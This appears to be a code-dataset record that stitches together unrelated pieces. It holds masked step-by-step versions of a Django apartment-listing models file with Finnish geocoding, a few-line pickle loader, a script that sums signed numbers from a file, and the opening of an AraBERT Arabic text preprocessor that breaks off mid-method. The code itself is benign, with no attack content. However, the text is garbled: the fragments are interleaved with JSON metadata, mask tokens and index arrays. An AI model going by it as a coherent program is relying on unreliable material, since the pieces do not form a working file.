models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n objects = ApartmentManager()\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return 'apartments:detail', [str(self.id)]\n\n def get_full_address(self):\n return '{0}, {1} {2}'.format(self.address, self.postcode, self.area\n .city.name.upper())\n\n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n searchable = '{0}, {1} {2}, Finland'.format(self.address, self.\n postcode, self.area.city)\n address, (lat, lng) = geocoder.geocode(searchable, exactly_one=True)\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n",
"step-2": "<mask token>\n\n\nclass City(models.Model):\n <mask token>\n\n\n class Meta:\n ordering = 'name',\n verbose_name_plural = 'cities'\n\n def __unicode__(self):\n return self.name\n\n\nclass Area(models.Model):\n name = models.CharField(max_length=50)\n city = models.ForeignKey(City)\n\n\n class Meta:\n unique_together = 'name', 'city'\n ordering = 'name',\n\n def __unicode__(self):\n return self.name\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n return self.filter(is_available=True, tenant__is_active=True)\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related('area',\n 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n if search:\n search = search.strip()\n if not search:\n return self.none()\n search_fields = ('area__name__iexact', 'area__city__name__iexact',\n 'postcode__iexact', 'address__icontains')\n criteria = [Q(**{field: search}) for field in search_fields]\n return self.filter(reduce(operator.or_, criteria))\n\n\nclass Apartment(models.Model):\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE = 4\n TYPE_CHOICES = (TYPE_APARTMENT, 'Apartment'), (TYPE_DETACHED,\n 'Detached house'), (TYPE_SEMIDETACHED, 'Semi-detached house'), (\n TYPE_COTTAGE, 'Cottage')\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n SAUNA_CHOICES = (SAUNA_NONE, 'No sauna'), (SAUNA_SHARED,\n 'Shared/communal sauna'), (SAUNA_OWN, 'Own sauna')\n ROOM_CHOICES = (1, '1 room'), (2, '2 rooms'), (3, '3 rooms'), (4, '4 rooms'\n )\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n LANDLORD_CHOICES = (LANDLORD_TENANT, 'Occupant'), (LANDLORD_PRIVATE,\n 'Private landlord'), (LANDLORD_AGENCY, 'Rental agency')\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n landlord = models.IntegerField(choices=LANDLORD_CHOICES, default=\n LANDLORD_PRIVATE)\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n is_shared = models.BooleanField('Shared accomodation', default=False)\n type = models.IntegerField(choices=TYPE_CHOICES, default=TYPE_APARTMENT)\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n sauna = models.IntegerField(choices=SAUNA_CHOICES, default=SAUNA_NONE)\n rent_pcm = models.DecimalField(decimal_places=2, max_digits=8)\n deposit = models.DecimalField(decimal_places=2, max_digits=8, null=True,\n blank=True)\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n objects = ApartmentManager()\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return 'apartments:detail', [str(self.id)]\n\n def get_full_address(self):\n return '{0}, {1} {2}'.format(self.address, self.postcode, self.area\n .city.name.upper())\n\n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n searchable = '{0}, {1} {2}, Finland'.format(self.address, self.\n postcode, self.area.city)\n address, (lat, lng) = geocoder.geocode(searchable, exactly_one=True)\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n",
"step-3": "<mask token>\n\n\nclass City(models.Model):\n name = models.CharField(max_length=30, unique=True)\n\n\n class Meta:\n ordering = 'name',\n verbose_name_plural = 'cities'\n\n def __unicode__(self):\n return self.name\n\n\nclass Area(models.Model):\n name = models.CharField(max_length=50)\n city = models.ForeignKey(City)\n\n\n class Meta:\n unique_together = 'name', 'city'\n ordering = 'name',\n\n def __unicode__(self):\n return self.name\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n return self.filter(is_available=True, tenant__is_active=True)\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related('area',\n 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n if search:\n search = search.strip()\n if not search:\n return self.none()\n search_fields = ('area__name__iexact', 'area__city__name__iexact',\n 'postcode__iexact', 'address__icontains')\n criteria = [Q(**{field: search}) for field in search_fields]\n return self.filter(reduce(operator.or_, criteria))\n\n\nclass Apartment(models.Model):\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE = 4\n TYPE_CHOICES = (TYPE_APARTMENT, 'Apartment'), (TYPE_DETACHED,\n 'Detached house'), (TYPE_SEMIDETACHED, 'Semi-detached house'), (\n TYPE_COTTAGE, 'Cottage')\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n SAUNA_CHOICES = (SAUNA_NONE, 'No sauna'), (SAUNA_SHARED,\n 'Shared/communal sauna'), (SAUNA_OWN, 'Own sauna')\n ROOM_CHOICES = (1, '1 room'), (2, '2 rooms'), (3, '3 rooms'), (4, '4 rooms'\n )\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n LANDLORD_CHOICES = (LANDLORD_TENANT, 'Occupant'), (LANDLORD_PRIVATE,\n 'Private landlord'), (LANDLORD_AGENCY, 'Rental agency')\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n landlord = models.IntegerField(choices=LANDLORD_CHOICES, default=\n LANDLORD_PRIVATE)\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n is_shared = models.BooleanField('Shared accomodation', default=False)\n type = models.IntegerField(choices=TYPE_CHOICES, default=TYPE_APARTMENT)\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n sauna = models.IntegerField(choices=SAUNA_CHOICES, default=SAUNA_NONE)\n rent_pcm = models.DecimalField(decimal_places=2, max_digits=8)\n deposit = models.DecimalField(decimal_places=2, max_digits=8, null=True,\n blank=True)\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n objects = ApartmentManager()\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return 'apartments:detail', [str(self.id)]\n\n def get_full_address(self):\n return '{0}, {1} {2}'.format(self.address, self.postcode, self.area\n .city.name.upper())\n\n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n searchable = '{0}, {1} {2}, Finland'.format(self.address, self.\n postcode, self.area.city)\n address, (lat, lng) = geocoder.geocode(searchable, exactly_one=True)\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n",
"step-4": "<mask token>\ngeocoder = geopy.geocoders.Google()\n\n\nclass City(models.Model):\n name = models.CharField(max_length=30, unique=True)\n\n\n class Meta:\n ordering = 'name',\n verbose_name_plural = 'cities'\n\n def __unicode__(self):\n return self.name\n\n\nclass Area(models.Model):\n name = models.CharField(max_length=50)\n city = models.ForeignKey(City)\n\n\n class Meta:\n unique_together = 'name', 'city'\n ordering = 'name',\n\n def __unicode__(self):\n return self.name\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n return self.filter(is_available=True, tenant__is_active=True)\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related('area',\n 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n if search:\n search = search.strip()\n if not search:\n return self.none()\n search_fields = ('area__name__iexact', 'area__city__name__iexact',\n 'postcode__iexact', 'address__icontains')\n criteria = [Q(**{field: search}) for field in search_fields]\n return self.filter(reduce(operator.or_, criteria))\n\n\nclass Apartment(models.Model):\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE = 4\n TYPE_CHOICES = (TYPE_APARTMENT, 'Apartment'), (TYPE_DETACHED,\n 'Detached house'), (TYPE_SEMIDETACHED, 'Semi-detached house'), (\n TYPE_COTTAGE, 'Cottage')\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n SAUNA_CHOICES = (SAUNA_NONE, 'No sauna'), (SAUNA_SHARED,\n 'Shared/communal sauna'), (SAUNA_OWN, 'Own sauna')\n ROOM_CHOICES = (1, '1 room'), (2, '2 rooms'), (3, '3 rooms'), (4, '4 rooms'\n )\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n LANDLORD_CHOICES = (LANDLORD_TENANT, 'Occupant'), (LANDLORD_PRIVATE,\n 'Private landlord'), (LANDLORD_AGENCY, 'Rental agency')\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n landlord = models.IntegerField(choices=LANDLORD_CHOICES, default=\n LANDLORD_PRIVATE)\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n is_shared = models.BooleanField('Shared accomodation', default=False)\n type = models.IntegerField(choices=TYPE_CHOICES, default=TYPE_APARTMENT)\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n sauna = models.IntegerField(choices=SAUNA_CHOICES, default=SAUNA_NONE)\n rent_pcm = models.DecimalField(decimal_places=2, max_digits=8)\n deposit = models.DecimalField(decimal_places=2, max_digits=8, null=True,\n blank=True)\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n objects = ApartmentManager()\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return 'apartments:detail', [str(self.id)]\n\n def get_full_address(self):\n return '{0}, {1} {2}'.format(self.address, self.postcode, self.area\n .city.name.upper())\n\n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n searchable = '{0}, {1} {2}, Finland'.format(self.address, self.\n postcode, self.area.city)\n address, (lat, lng) = geocoder.geocode(searchable, exactly_one=True)\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n",
"step-5": "import datetime\nimport operator\n\nimport geopy\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.db.models.query import QuerySet\nfrom django.db.models import permalink\nfrom django.contrib.auth.models import User\n\n\ngeocoder = geopy.geocoders.Google()\n\n\nclass City(models.Model):\n\n name = models.CharField(max_length=30, unique=True)\n\n class Meta:\n ordering = ('name',)\n verbose_name_plural = \"cities\"\n\n def __unicode__(self):\n return self.name\n\n\nclass Area(models.Model):\n\n name = models.CharField(max_length=50)\n city = models.ForeignKey(City)\n\n class Meta:\n unique_together = ('name', 'city')\n ordering = ('name',)\n\n def __unicode__(self):\n return self.name\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n\n return self.filter(\n is_available=True,\n tenant__is_active=True,\n )\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related(\n 'area', 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n\n if search:\n search = search.strip()\n\n if not search:\n return self.none()\n\n search_fields = (\n 'area__name__iexact',\n 'area__city__name__iexact',\n 'postcode__iexact',\n 'address__icontains',\n )\n\n criteria = [Q(**{field : search}) \n for field in search_fields]\n\n return self.filter(reduce(operator.or_, criteria))\n \n\nclass Apartment(models.Model):\n\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE =4 \n\n TYPE_CHOICES = (\n (TYPE_APARTMENT, \"Apartment\"),\n (TYPE_DETACHED, \"Detached house\"),\n (TYPE_SEMIDETACHED, \"Semi-detached house\"),\n (TYPE_COTTAGE, \"Cottage\"),\n )\n\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n\n SAUNA_CHOICES = (\n (SAUNA_NONE, \"No sauna\"),\n (SAUNA_SHARED, \"Shared/communal sauna\"),\n (SAUNA_OWN, \"Own sauna\"),\n )\n\n ROOM_CHOICES = (\n (1, \"1 room\"),\n (2, \"2 rooms\"),\n (3, \"3 rooms\"),\n (4, \"4 rooms\"),\n )\n\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n\n LANDLORD_CHOICES = (\n (LANDLORD_TENANT, \"Occupant\"),\n (LANDLORD_PRIVATE, \"Private landlord\"),\n (LANDLORD_AGENCY, \"Rental agency\"),\n )\n\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n \n landlord = models.IntegerField(\n choices=LANDLORD_CHOICES,\n default=LANDLORD_PRIVATE,\n )\n\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n\n is_shared = models.BooleanField('Shared accomodation', default=False)\n\n type = models.IntegerField(\n choices=TYPE_CHOICES,\n default=TYPE_APARTMENT,\n )\n\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n\n sauna = models.IntegerField(\n choices=SAUNA_CHOICES,\n default=SAUNA_NONE,\n )\n\n rent_pcm = models.DecimalField(\n decimal_places=2,\n max_digits=8,\n )\n\n deposit = models.DecimalField(\n decimal_places=2,\n max_digits=8,\n null=True,\n blank=True\n )\n\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n\n\n objects = ApartmentManager()\n\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return ('apartments:detail', [str(self.id)])\n\n def get_full_address(self):\n\n return \"{0}, {1} {2}\".format(\n self.address,\n self.postcode,\n self.area.city.name.upper()\n )\n\n \n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n\n searchable = \"{0}, {1} {2}, Finland\".format(\n self.address,\n self.postcode,\n self.area.city,\n )\n\n address, (lat, lng) = geocoder.geocode(\n searchable,\n exactly_one=True\n )\n\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n\n \n",
"step-ids": [
15,
19,
20,
21,
23
]
}
|
[
15,
19,
20,
21,
23
] |
import pickle
if __name__ == '__main__':
with open('id_generator.bin', 'rb') as f:
print(pickle.load(f))
|
normal
|
{
"blob_id": "080110e404cf5edfe53622a5942b53f9188ddd76",
"index": 1854,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n with open('id_generator.bin', 'rb') as f:\n print(pickle.load(f))\n",
"step-3": "import pickle\nif __name__ == '__main__':\n with open('id_generator.bin', 'rb') as f:\n print(pickle.load(f))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
import sys
def sumInput(text):
f = open(text, 'r')
sum = 0
count = 1
for line in f:
count += 1
line = line.strip()
if (line[0] == '+'):
sum += int(line[1:])
else:
sum -= int(line[1:])
f.close()
return sum
def main():
print(sumInput('input.txt'))
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "c0d71d970b2632dbf182a5ee8bad27d3e41578f6",
"index": 208,
"step-1": "<mask token>\n\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if line[0] == '+':\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if line[0] == '+':\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\n\ndef main():\n print(sumInput('input.txt'))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if line[0] == '+':\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\n\ndef main():\n print(sumInput('input.txt'))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\n\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if line[0] == '+':\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\n\ndef main():\n print(sumInput('input.txt'))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3\n\nimport sys\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if (line[0] == '+'):\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\ndef main():\n print(sumInput('input.txt'))\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import html
import logging
import re
import pyarabic.araby as araby
ACCEPTED_MODELS = [
"bert-base-arabertv01",
"bert-base-arabert",
"bert-base-arabertv02",
"bert-base-arabertv2",
"bert-large-arabertv02",
"bert-large-arabertv2",
"araelectra-base",
"araelectra-base-discriminator",
"araelectra-base-generator",
"aragpt2-base",
"aragpt2-medium",
"aragpt2-large",
"aragpt2-mega",
]
SEGMENTED_MODELS = [
"bert-base-arabert",
"bert-base-arabertv2",
"bert-large-arabertv2",
]
class ArbertmoPreprocessor:
"""
A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.
It also can unprocess the text ouput of the generated text
Args:
model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to "bert-base-arabertv02". Current accepted models are:
- :obj:`"bert-base-arabertv01"`: No farasa segmentation.
- :obj:`"bert-base-arabert"`: with farasa segmentation.
- :obj:`"bert-base-arabertv02"`: No farasas egmentation.
- :obj:`"bert-base-arabertv2"`: with farasa segmentation.
- :obj:`"bert-large-arabertv02"`: No farasas egmentation.
- :obj:`"bert-large-arabertv2"`: with farasa segmentation.
- :obj:`"araelectra-base"`: No farasa segmentation.
- :obj:`"araelectra-base-discriminator"`: No farasa segmentation.
- :obj:`"araelectra-base-generator"`: No farasa segmentation.
- :obj:`"aragpt2-base"`: No farasa segmentation.
- :obj:`"aragpt2-medium"`: No farasa segmentation.
- :obj:`"aragpt2-large"`: No farasa segmentation.
- :obj:`"aragpt2-mega"`: No farasa segmentation.
keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False
remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True
replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True
strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)
strip_tatweel(:obj: `bool`): remove tatweel '\\u0640'
insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words
remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character
Returns:
ArBERTMoPreprocessor: the preprocessor class
Example:
from preprocess import ArBERTMoPreprocessor
arabert_prep = ArBERTMoPreprocessor("aubmindlab/bert-base-arabertv2")
arabert_prep.preprocess("SOME ARABIC TEXT")
"""
def __init__(
self,
model_name,
keep_emojis=False,
remove_html_markup=True,
replace_urls_emails_mentions=True,
strip_tashkeel=True,
strip_tatweel=True,
insert_white_spaces=True,
remove_elongation=True,
):
"""
model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to "bert-base-arabertv02". Current accepted models are:
- :obj:`"bert-base-arabertv01"`: No farasa segmentation.
- :obj:`"bert-base-arabert"`: with farasa segmentation.
- :obj:`"bert-base-arabertv02"`: No farasas egmentation.
- :obj:`"bert-base-arabertv2"`: with farasa segmentation.
- :obj:`"bert-large-arabertv02"`: No farasas egmentation.
- :obj:`"bert-large-arabertv2"`: with farasa segmentation.
- :obj:`"araelectra-base"`: No farasa segmentation.
- :obj:`"araelectra-base-discriminator"`: No farasa segmentation.
- :obj:`"araelectra-base-generator"`: No farasa segmentation.
- :obj:`"aragpt2-base"`: No farasa segmentation.
- :obj:`"aragpt2-medium"`: No farasa segmentation.
- :obj:`"aragpt2-large"`: No farasa segmentation.
- :obj:`"aragpt2-mega"`: No farasa segmentation.
keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False
remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True
replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True
strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)
strip_tatweel(:obj: `bool`): remove tatweel '\\u0640'
insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words
remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character
"""
model_name = model_name.replace("aubmindlab/", "")
if model_name not in ACCEPTED_MODELS:
logging.warning(
"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation"
)
self.model_name = "bert-base-arabertv02"
else:
self.model_name = model_name
if self.model_name in SEGMENTED_MODELS:
logging.info(
"Selected Model requires pre-segmentation, Initializing FarasaSegmenter"
)
try:
from farasa.segmenter import FarasaSegmenter
self.farasa_segmenter = FarasaSegmenter(interactive=True)
except:
logging.warning(
"farasapy is not installed, you want be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy"
)
else:
logging.info(
"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization"
)
self.keep_emojis = keep_emojis
if self.keep_emojis:
import emoji
self.emoji = emoji
if self.model_name in SEGMENTED_MODELS:
logging.warning(
"Keeping tweets with Farasa Segmentation is 10 times slower"
)
self.remove_html_markup = remove_html_markup
self.replace_urls_emails_mentions = replace_urls_emails_mentions
self.strip_tashkeel = strip_tashkeel
self.strip_tatweel = strip_tatweel
self.insert_white_spaces = insert_white_spaces
self.remove_elongation = remove_elongation
def preprocess(self, text):
"""
Preprocess takes an input text line an applies the same preprocessing used in AraBERT
pretraining
Args:
text (:obj:`str`): inout text string
Returns:
string: A preprocessed string depending on which model was selected
"""
if self.model_name == "bert-base-arabert":
return self._old_preprocess(
text,
do_farasa_tokenization=True,
)
if self.model_name == "bert-base-arabertv01":
return self._old_preprocess(text, do_farasa_tokenization=False)
text = str(text)
text = html.unescape(text)
if self.strip_tashkeel:
text = araby.strip_tashkeel(text)
if self.strip_tatweel:
text = araby.strip_tatweel(text)
if self.replace_urls_emails_mentions:
# replace all possible URLs
for reg in url_regexes:
text = re.sub(reg, " [رابط] ", text)
# REplace Emails with [بريد]
for reg in email_regexes:
text = re.sub(reg, " [بريد] ", text)
# replace mentions with [مستخدم]
text = re.sub(user_mention_regex, " [مستخدم] ", text)
if self.remove_html_markup:
# remove html line breaks
text = re.sub("<br />", " ", text)
# remove html markup
text = re.sub("</?[^>]+>", " ", text)
# remove repeated characters >2
if self.remove_elongation:
text = self._remove_elongation(text)
# insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets
if self.insert_white_spaces:
text = re.sub(
"([^0-9\u0621-\u063A\u0641-\u064A\u0660-\u0669a-zA-Z\[\]])",
r" \1 ",
text,
)
# insert whitespace between words and numbers or numbers and words
text = re.sub(
"(\d+)([\u0621-\u063A\u0641-\u064A\u0660-\u066C]+)", r" \1 \2 ", text
)
text = re.sub(
"([\u0621-\u063A\u0641-\u064A\u0660-\u066C]+)(\d+)", r" \1 \2 ", text
)
# remove unwanted characters
if self.keep_emojis:
